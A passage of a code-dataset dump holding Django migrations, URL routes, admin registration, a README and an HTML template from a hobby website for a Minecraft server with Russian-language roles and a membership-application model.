name='image4',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AddField(\r\n model_name='city',\r\n name='image5',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='image',\r\n field=models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/'),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='smol_text',\r\n field=models.TextField(max_length=400),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='text',\r\n field=models.TextField(),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.8936170339584351, "alphanum_fraction": 0.8936170339584351, "avg_line_length": 10.75, "blob_id": "72ad2e7655146b20e2787fa1a8204312e0ff6ed7", "content_id": "98094a5fc107c8991c532cf7b6c16f487d1bb016", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 47, "license_type": "no_license", "max_line_length": 23, "num_lines": 4, "path": "/requirements.txt", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "django\nrequests\nPillow\ndjango-multiselectfield\n" }, { "alpha_fraction": 0.47843137383461, "alphanum_fraction": 0.5156862735748291, "avg_line_length": 21.18181800842285, "blob_id": "055277065b42b303c0ba7cde17ead483035109c3", "content_id": "aadfa7dada4c9c3459057dda38bd5ca164ad3bf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 58, "num_lines": 22, "path": "/blog/migrations/0004_auto_20210617_2123.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 18:23\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0003_users'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterModelOptions(\r\n name='users',\r\n options={'ordering': ('create_date', 'role')},\r\n ),\r\n migrations.AlterField(\r\n model_name='users',\r\n name='role',\r\n field=models.TextField(),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5854838490486145, "alphanum_fraction": 0.6193548440933228, "avg_line_length": 31.63157844543457, "blob_id": "f8c3cb356339f43cf67149cf373ca21d287da624", "content_id": "aeab3b831641f47a28b7d0c29e0cb59d0ff601f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 262, "num_lines": 19, "path": "/blog/migrations/0036_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-22 06:53\n\nfrom django.db import migrations\nimport multiselectfield.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0035_alter_profile_role'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=multiselectfield.db.fields.MultiSelectField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Представитель города', 'Представитель города'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=54),\n ),\n ]\n" }, { "alpha_fraction": 0.5846200585365295, "alphanum_fraction": 0.5846200585365295, "avg_line_length": 45.869564056396484, "blob_id": "de3bd1d81bc4f1710b2be7479077604033f65042", "content_id": "7ff69e7b5b0d1460996271f98eae47325281f7cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3303, "license_type": "no_license", "max_line_length": 138, "num_lines": 69, "path": "/blog/urls.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\nfrom django.urls import path, re_path\r\nfrom . import views\r\n\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.conf.urls.static import static\r\nfrom django.conf import settings\r\n\r\n\r\n\r\nurlpatterns = [\r\n path('',views.show_main),\r\n path('main/',views.show_main),\r\n path('map/',views.show_map),\r\n path('info/',views.show_info),\r\n path('register/', views.register),\r\n path('logout/', views.logout_user, name='logout'),\r\n path('login/', views.login_user, name='login'),\r\n path('all_profile/', views.all_profile),\r\n\r\n path('profile/', views.profile),\r\n path('profile/<int:user_id>/', views.another_profile, name='another_profile'),\r\n path('profile/delete/user_comment/<int:user_id>/<int:comment_id>',views.delete_user_comment, name='user_comment_delete'),\r\n path('profile/upgrade/', views.upgrade_profile),\r\n\r\n\r\n path('news/<int:news_id>/',views.show_one_news, name='one_news'),\r\n path('news/add/', views.add_news),\r\n path('news/edit/<int:news_id>/', views.edit_news, name='edit_one_news'),\r\n path('news/delete/<int:news_id>/',views.delete_news, name='news_delete'),\r\n path('news/delete/comment/<int:news_id>/<int:comment_id>',views.delete_news_comment, name='news_comment_delete'),\r\n path('news/edit/comment/<int:news_id>/<int:comment_id>',views.edit_news_comment, name='news_comment_edit'),\r\n re_path(r'^news*',views.show_news),\r\n\r\n \r\n path('city/<int:city_id>/',views.show_one_city, name='one_city'),\r\n path('city/add/', views.add_city),\r\n path('city/edit/<int:city_id>/', views.edit_city, name='edit_one_city'),\r\n path('city/delete/<int:city_id>/',views.delete_city, name='city_delete'),\r\n re_path(r'^cities*',views.show_cities),\r\n\r\n \r\n \r\n path('form/add/', views.add_form),\r\n path('form/edit/<int:form_id>/', views.edit_form, name='edit_one_form'),\r\n path('form/<int:form_id>/',views.show_one_form, name='one_form'),\r\n re_path(r'^forms*',views.show_forms),\r\n\r\n \r\n path('article/add/', views.add_article),\r\n path('article/edit/<int:article_id>/', views.edit_article, name='edit_one_article'),\r\n path('article/<int:article_id>/',views.show_one_article, name='one_article'),\r\n path('article/delete/<int:article_id>/',views.delete_article, name='article_delete'),\r\n path('article/delete/comment/<int:article_id>/<int:comment_id>',views.delete_article_comment, name='article_comment_delete'),\r\n path('article/edit/comment/<int:article_id>/<int:comment_id>',views.edit_article_comment, name='article_comment_edit'),\r\n re_path(r'^articles*',views.show_articles),\r\n\r\n\r\n path('change_theme/<str:theme_name>', views.change_theme, name='change_theme'),\r\n\r\n path('api/', views.api, name=\"api\"),\r\n path('discord/', views.discord, name=\"discord\"),\r\n \r\n]\r\n\r\n\r\n\r\nif settings.DEBUG:\r\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n" }, { "alpha_fraction": 0.5735785961151123, "alphanum_fraction": 0.6086956262588501, "avg_line_length": 30.473684310913086, "blob_id": "31b2c4c7fa89cc5ce8da3c7d2447e92064018769", "content_id": "6f08fa4cf52e13401c124c8c7c2827dd96b1f07b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 677, "license_type": "no_license", "max_line_length": 240, "num_lines": 19, "path": "/blog/migrations/0035_alter_profile_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 19:08\n\nfrom django.db import migrations\nimport multiselectfield.db.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0034_alter_profile_role'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=multiselectfield.db.fields.MultiSelectField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=43),\n ),\n ]\n" }, { "alpha_fraction": 0.5651785731315613, "alphanum_fraction": 0.5928571224212646, "avg_line_length": 34.129032135009766, "blob_id": "afb6dbcb3a385e49cff77eea36cc17382969afdc", "content_id": "2a51bdbee357141e0246cfe3900d50a17762e1c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1120, "license_type": "no_license", "max_line_length": 121, "num_lines": 31, "path": "/blog/migrations/0006_auto_20210617_2242.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-17 19:42\r\n\r\nfrom django.conf import settings\r\nfrom django.db import migrations, models\r\nimport django.db.models.deletion\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\r\n ('blog', '0005_auto_20210617_2127'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Profile',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('user_image', models.ImageField(upload_to='users/user_image/')),\r\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\r\n ('role', models.TextField()),\r\n ('admin', models.BooleanField(default=False)),\r\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\r\n ],\r\n ),\r\n migrations.DeleteModel(\r\n name='Users',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4939759075641632, "alphanum_fraction": 0.5438898205757141, "avg_line_length": 23.2608699798584, "blob_id": "ec53f2a2ef6786f164d8ecc2da340ea376230db4", "content_id": "bc38808bb7d72c1931386614c3180543a2024d4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 63, "num_lines": 23, "path": "/blog/migrations/0027_auto_20210623_1040.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-23 07:40\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0026_usercomment'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='comment',\r\n name='user_id',\r\n field=models.CharField(default=2, max_length=1000),\r\n ),\r\n migrations.AddField(\r\n model_name='usercomment',\r\n name='userid',\r\n field=models.CharField(default=2, max_length=1000),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.4552631676197052, "alphanum_fraction": 0.5368421077728271, "avg_line_length": 19.11111068725586, "blob_id": "6021a888dd85ce83bfe3eb744e383c516337d5f5", "content_id": "fa21027ef7f2903ec19ba952516bb9587570e89e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/blog/migrations/0025_rename_user_role_comment_role.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 17:27\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0024_auto_20210622_2014'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='comment',\r\n old_name='user_role',\r\n new_name='role',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.6004319787025452, "avg_line_length": 22.36842155456543, "blob_id": "9d4ba813eac17563f4909eaa1615578c81f77664", "content_id": "b2e2efc90e5130f1131feaaa7bef7a814e3dccb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 463, "license_type": "no_license", "max_line_length": 74, "num_lines": 19, "path": "/blog/migrations/0020_penetration_create_date.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 09:34\r\n\r\nfrom django.db import migrations, models\r\nimport django.utils.timezone\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0019_penetration_status'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='penetration',\r\n name='create_date',\r\n field=models.DateTimeField(default=django.utils.timezone.now),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5420819520950317, "alphanum_fraction": 0.5708748698234558, "avg_line_length": 41, "blob_id": "4aed1b82e305cc8c8b0e0db60eb03237c1c6b7e4", "content_id": "36472a221032feea6529103184f719c4618f8c59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1926, "license_type": "no_license", "max_line_length": 147, "num_lines": 42, "path": "/blog/migrations/0018_auto_20210622_1133.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 08:33\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0017_auto_20210621_2136'),\r\n ]\r\n\r\n operations = [\r\n migrations.CreateModel(\r\n name='Penetration',\r\n fields=[\r\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\r\n ('minecraft_nickname', models.CharField(default='Не указано', max_length=100)),\r\n ('site_username', models.CharField(default='Не указано', max_length=100)),\r\n ('donation_username', models.CharField(default='Не указано', max_length=100)),\r\n ('free_token', models.CharField(default='Не указано', max_length=300)),\r\n ('donation_image', models.ImageField(blank=True, default='penetration/image/default/default.png', upload_to='penetration/image/')),\r\n ('description_yourself', models.TextField(default='Не описано.')),\r\n ('how_you_know', models.TextField(default='Не описано.', max_length=400)),\r\n ('contact', models.CharField(max_length=200)),\r\n ],\r\n ),\r\n migrations.AddField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.BooleanField(default=False),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='smol_text',\r\n field=models.TextField(default='Информация от мэра города не поступила.', max_length=400),\r\n ),\r\n migrations.AlterField(\r\n model_name='city',\r\n name='text',\r\n field=models.TextField(default='Информация от мэра города не поступила.'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5198675394058228, "alphanum_fraction": 0.5529801249504089, "avg_line_length": 24.2608699798584, "blob_id": "3d5829d675cc8c3153b1b5d94f2c44cdb47cd7e7", "content_id": "5fb4eb6485c4c2be586e56e6a0ea8bb9f416ed4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 613, "license_type": "no_license", "max_line_length": 66, "num_lines": 23, "path": "/blog/migrations/0021_auto_20210622_1616.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-22 13:16\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0020_penetration_create_date'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='penetration',\r\n name='how_you_know',\r\n field=models.TextField(default='Не описано.'),\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='registered',\r\n field=models.CharField(default='False', max_length=5),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.8030303120613098, "alphanum_fraction": 0.8030303120613098, "avg_line_length": 28.615385055541992, "blob_id": "eee8002ee187e31a2314ca62c527a82fb24cdea2", "content_id": "8c1ffecadcb4591070cfa54bb2bcf124cebf79ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 103, "num_lines": 13, "path": "/blog/admin.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.contrib import admin\r\n\r\nfrom .models import Profile, News, Article, City, Penetration, NewsComment, UserComment, ArticleComment\r\n\r\n\r\nadmin.site.register(Profile)\r\nadmin.site.register(News)\r\nadmin.site.register(Article)\r\nadmin.site.register(City)\r\nadmin.site.register(Penetration)\r\nadmin.site.register(NewsComment)\r\nadmin.site.register(UserComment)\r\nadmin.site.register(ArticleComment)" }, { "alpha_fraction": 0.4633758068084717, "alphanum_fraction": 0.5238853693008423, "avg_line_length": 26.545454025268555, "blob_id": "56ea1f24fa547f5ac9591811193a8bb3790f3487", "content_id": "f395a8b69149688aa2cb0893e633913794e17c0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "no_license", "max_line_length": 162, "num_lines": 22, "path": "/blog/migrations/0010_auto_20210618_1935.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 16:35\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0009_auto_20210618_1931'),\r\n ]\r\n\r\n operations = [\r\n migrations.RemoveField(\r\n model_name='profile',\r\n name='year_in_school',\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='role',\r\n field=models.CharField(choices=[('r1', 'Игрок'), ('r2', 'Журналист'), ('r3', 'Мэр'), ('r4', 'Президент'), ('r5', 'ФБР')], default='r1', max_length=2),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "e1abb1a55e270a1caf270a4c3911b6e27ee8d7cf", "content_id": "47f0a48d28d53cd80d7bed55547913cc927fdb75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 93, "license_type": "no_license", "max_line_length": 44, "num_lines": 4, "path": "/README.md", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Marupik_site\nSite for minecraft server\n\n[ссылка](http://mmarupik.pythonanywhere.com)\n" }, { "alpha_fraction": 0.5273833870887756, "alphanum_fraction": 0.5943204760551453, "avg_line_length": 26.38888931274414, "blob_id": "058f6f5907255c0d15a3eb31ea3e7be98c83e231", "content_id": "4d9c496b41a81dfd43ef80943173a00bc2266ab3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 553, "license_type": "no_license", "max_line_length": 164, "num_lines": 18, "path": "/blog/migrations/0031_city_status.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 16:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0030_auto_20210719_1639'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='city',\n name='status',\n field=models.CharField(choices=[('Открыт', 'Открыт'), ('Закрыт', 'Закрыт'), ('Не функционирует', 'Не функционирует')], default='Открыт', max_length=17),\n ),\n ]\n" }, { "alpha_fraction": 0.5155763030052185, "alphanum_fraction": 0.5638629198074341, "avg_line_length": 25.913043975830078, "blob_id": "45eb403821e7e7926eaca6b4704d9dde4aa7f0a7", "content_id": "fa62abd3c836bec21c33a3e70a4a16755731934a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 647, "license_type": "no_license", "max_line_length": 127, "num_lines": 23, "path": "/blog/migrations/0007_auto_20210618_1239.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-18 09:39\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0006_auto_20210617_2242'),\r\n ]\r\n\r\n operations = [\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='role',\r\n field=models.TextField(default='Игрок'),\r\n ),\r\n migrations.AlterField(\r\n model_name='profile',\r\n name='user_image',\r\n field=models.ImageField(blank=True, default='users/user_image/default/default.png', upload_to='users/user_image/'),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5739871263504028, "alphanum_fraction": 0.5875741243362427, "avg_line_length": 62.25, "blob_id": "8efe543f5769a0b446c78de42150738f90384a96", "content_id": "01ac128cc9623c5d8d5fea75e6d0b64603151a2a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8430, "license_type": "no_license", "max_line_length": 220, "num_lines": 128, "path": "/blog/migrations/0001_initial.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.5 on 2021-07-19 11:14\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image2', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image1', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image3', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image4', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image5', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('title', models.CharField(max_length=100)),\n ('smol_text', models.TextField(default='Информация от мэра города не поступила.', max_length=400)),\n ('text', models.TextField(default='Информация от мэра города не поступила.')),\n ('contact_url', models.URLField()),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ('mayor', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='News',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.ImageField(upload_to='news/image/')),\n ('title', models.CharField(max_length=1000)),\n ('text', models.TextField()),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('pyblished_date', models.DateTimeField(blank=True, null=True)),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Penetration',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('minecraft_nickname', models.CharField(default='Не указано', max_length=100)),\n ('site_username', models.CharField(default='Не указано', max_length=100)),\n ('donation_username', models.CharField(default='Не указано', max_length=100)),\n ('free_token', models.CharField(default='Не указано', max_length=300)),\n ('donation_image', models.ImageField(blank=True, default='penetration/image/default/default.png', upload_to='penetration/image/')),\n ('description_yourself', models.TextField(default='Не описано.')),\n ('how_you_know', models.TextField(default='Не описано.')),\n ('contact', models.CharField(max_length=200)),\n ('status', models.BooleanField(default=False)),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('image', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image1', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image2', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image3', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image4', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('image5', models.ImageField(blank=True, default='city/image/default/default.png', upload_to='city/image/')),\n ('title', models.CharField(max_length=100)),\n ('smol_text', models.TextField(default='Информация от мэра города не поступила.', max_length=400)),\n ('text', models.TextField(default='Информация от мэра города не поступила.')),\n ('contact_url', models.URLField()),\n ('active', models.BooleanField(default=True)),\n ('author', models.CharField(default='ananist', max_length=100)),\n ('mayor', models.CharField(default='ananist', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='UserComment',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('unconfirmed_discord', models.CharField(max_length=100)),\n ('user_image', models.ImageField(blank=True, default='users/user_image/default/default.png', upload_to='users/user_image/')),\n ('info', models.TextField(default='Проходивший мимо пользователь сайта,который ничего о себе не написал', max_length=1000)),\n ('create_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('role', models.CharField(choices=[('Игрок', 'Игрок'), ('Журналист', 'Журналист'), ('Мэр', 'Мэр'), ('Президент', 'Президент'), ('ФБР', 'ФБР'), ('Глава ФБР', 'Глава ФБР')], default='Игрок', max_length=9)),\n ('discord', models.CharField(max_length=100)),\n ('admin', models.BooleanField(default=False)),\n ('registered', models.BooleanField(default=False)),\n ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n migrations.CreateModel(\n name='Comment',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('image', models.CharField(default='none', max_length=300)),\n ('name', models.CharField(max_length=100)),\n ('userid', models.CharField(default=3, max_length=1000)),\n ('role', models.CharField(default='Игрок', max_length=100)),\n ('body', models.TextField()),\n ('created', models.DateTimeField(default=django.utils.timezone.now)),\n ('active', models.BooleanField(default=True)),\n ('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='blog.news')),\n ],\n options={\n 'ordering': ('created',),\n },\n ),\n ]\n" }, { "alpha_fraction": 0.4950248897075653, "alphanum_fraction": 0.5497512221336365, "avg_line_length": 20.33333396911621, "blob_id": "595fef1962fbe5a6cfd533fdd27131e6aa3d93ab", "content_id": "35ae3b48442ed56ac2535c35210a2b150f3339ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 402, "license_type": "no_license", "max_line_length": 70, "num_lines": 18, "path": "/blog/migrations/0016_city_mayor.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-06-20 17:33\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0015_city'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='city',\r\n name='mayor',\r\n field=models.CharField(default='ananist', max_length=100),\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5678198933601379, "alphanum_fraction": 0.5799011588096619, "avg_line_length": 29.350000381469727, "blob_id": "8c7745dfce9523adeebafa25fc8a2e6787a64d22", "content_id": "ad1954dd10e80e90eb473b555b43264b203b54e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 145, "num_lines": 60, "path": "/blog/templates/city/one_city_page.html", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "{% load static %}\n\n<!DOCTYPE html>\n<html>\n\n<head>\n\t{% include 'parts_of_page/pages_head.html' %}\n\t<script type=\"text/javascript\" src=\"http://code.jquery.com/jquery-1.9.1.min.js\"></script>\n\t<script type=\"text/javascript\" src=\"{% static 'js/jquery.waterwheelCarousel.js' %}\"></script>\n\t<script type=\"text/javascript\" src=\"{% static 'js/Carousel.js' %}\"></script>\n\n</head>\n\t\n\n<body>\n\n\n<div class = \"wrapper\">\n\t{% include 'parts_of_page/header.html' %}\n\n\t<div class = \"content\" style=\"width: 100%;\">\n\t\t\t\n\t\t<div class=\"one_city\">\n\t\t\t\t\n\t\t\t\t<h1 class=\"title\">{{city.title}}</h1>\n\t\t\t\t<p class=\"author\">Информацию написал {{city.author}}</p>\n\t\t\t\t<p class=\"mayor\">Мэр города: {{city.mayor}}</p>\n\t\t\t\t<div id=\"carousel\">\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image1.url}}\" id=\"item-1\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image2.url}}\" id=\"item-2\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image3.url}}\" id=\"item-3\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image4.url}}\" id=\"item-4\" /></a>\n\t\t\t\t\t<a href=\"#\"><img src=\"{{city.image5.url}}\" id=\"item-5\" /></a>\n\t\t\t\t</div>\n\n\t\t\t\t<p>Этот город {{status}}</p>\n\n\t\t\t\t<div class=\"text\" style=\"margin-bottom: 50px;\">\n\t\t\t\t\t{% for line in text %}\n\t\t\t\t\t\t<p>{{line}}</p>\n\t\t\t\t\t{% endfor %}\n\t\t\t\t</div>\n\n\t\t\t\t<a href=\"{{city.contact_url}}\">Отправить заявку на вступление.</a>\n\t\t\t\t<div class=\"buttons\" style=\"margin-top: 50px;\">\n\t\t\t\t\t{% if city.author == user.username or user.username == mayor or user.profile.admin or 'Представитель города' in request.user.profile.role %}\n\t\t\t\t\t\t<a class=\"button\" style=\"float:left;\" href=\"{%url 'edit_one_city' city_id=city.pk%}\">Редактировать</a>\n\t\t\t\t\t\t<a class=\"button\" style=\"float:right;\" href=\"{%url 'city_delete' city_id=city.pk%}\">Удалить</a>\n\t\t\t\t\t{% endif %}\n\t\t\t\t</div>\n\t\t\t</div>\n\t\t\t\n\t</div>\n\n\t{% include 'parts_of_page/footer.html' %}\n</div>\n\n\n</body>\n</html>\n" }, { "alpha_fraction": 0.5435435175895691, "alphanum_fraction": 0.5795795917510986, "avg_line_length": 29.272727966308594, "blob_id": "df025212b496cd2a321097f5161481f9435d2375", "content_id": "ce01c3f82ea964c9750ff48c7235d82cf3a04b59", "detected_licenses": [], "is_generated": false, 